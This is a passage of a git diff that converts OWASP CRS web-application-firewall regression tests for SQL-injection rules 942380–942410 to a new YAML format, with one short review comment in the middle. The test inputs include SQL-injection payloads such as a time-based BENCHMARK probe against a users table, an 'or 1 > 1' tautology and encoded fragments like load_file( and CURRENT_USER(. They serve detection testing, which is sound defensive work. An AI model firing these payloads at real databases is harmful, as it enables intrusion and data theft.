"OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" - version: HTTP/1.0 - output: - log_contains: id "942380" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml index 62e8200bf..05ce6b989 100644 
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml @@ -1,23 +1,21 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942390.yaml +rule_id: 942390 tests: - - test_title: 942390-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=sdfsd%27or%201%20%3e%201" - version: HTTP/1.0 - output: - log_contains: id "942390" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=sdfsd%27or%201%20%3e%201" + version: HTTP/1.0 + output: + log: + expect_ids: [942390] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml index 7845fb918..2de63c416 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml 
@@ -1,43 +1,41 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942400.yaml +rule_id: 942400 tests: - - test_title: 942400-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # variable name boundary attacks - data: "and '5'orig_var_datavarname=whatever" - version: HTTP/1.0 - output: - log_contains: id "942400" - - test_title: 942400-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # variable name boundary attacks + data: "and '5'orig_var_datavarname=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942400] + - test_id: 2 desc: "SQL Injection Attack - false positive" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # variable name boundary attacks - data: "and 7 oranges" - version: HTTP/1.0 - output: - no_log_contains: id "942400" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # variable name boundary attacks + data: "and 7 oranges" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942400] 
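Review bot: The re-indented comment `# variable name boundary attacks` is repeated verbatim above both stages, but in test_id 2 it labels `data: "and 7 oranges"`, which is the benign input of the false-positive case rather than an attack, so for that stage the comment describes the wrong thing. I would keep the existing wording only in test_id 1 and change the line in test_id 2 to `# benign input: a digit directly followed by a word must not trip the variable-name boundary check`, so a reader sees at once why `no_expect_ids` is the expected outcome there. The two `desc` values already distinguish the attack from the false-positive case, so only the comment needs the change.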
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml index 75f566775..a3ee7e847 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml 
@@ -1,2013 +1,2011 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942410.yaml +rule_id: 942410 tests: - - test_title: 942410-1 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ABS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-2 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "benchmark(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-3 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENChmARk(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-4 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cast(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-5 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CAST(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-6 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "char(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-7 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "chaR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-8 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "chr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-9 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CHR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-10 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COALESCE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-11 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Compress (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-12 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "concat (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-13 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cOnCaT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-14 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "concat_ws(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-15 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP 
CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "convert(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-16 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cOnVeRt(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-17 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-18 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COUNT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-19 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CURRENT_USER(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-20 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "database (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-21 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "date(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-22 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=date%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-23 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=day.+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-24 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=day%26%27%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-25 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=decode%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-26 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=default%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-27 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ELT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-28 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=encode%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-29 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ExtractValue%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-30 - desc: "SQL 
Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=EXTRACTVALUE%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-31 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=floor%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-32 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FLOOR+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-33 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=format%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-34 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=GROUP_CONCAT%28" - version: HTTP/1.0 - output: - 
log_contains: id "942410" - - test_title: 942410-35 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=hex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-36 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=hEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-37 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if+%21%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-38 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-39 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if%28" 
- version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-40 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-41 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IFNULL%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-42 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=in+%27%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-43 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IN+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-44 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - 
port: 80 - uri: "/post" - data: "pay=IN%2F%2A%2A%2F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-45 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=insert%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-46 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=left%27%29%3F%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-47 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=LEFT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-48 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%7C%7C%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-49 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%7C%7C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-50 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-51 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%26%26%21%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-52 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-53 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=LENGTH%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-54 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ln+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-55 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ln%29+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-56 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=load_file%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-57 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=local%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-58 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=log%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-59 - desc: "SQL Injection Attack" - 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=log%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-60 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=lower%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-61 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 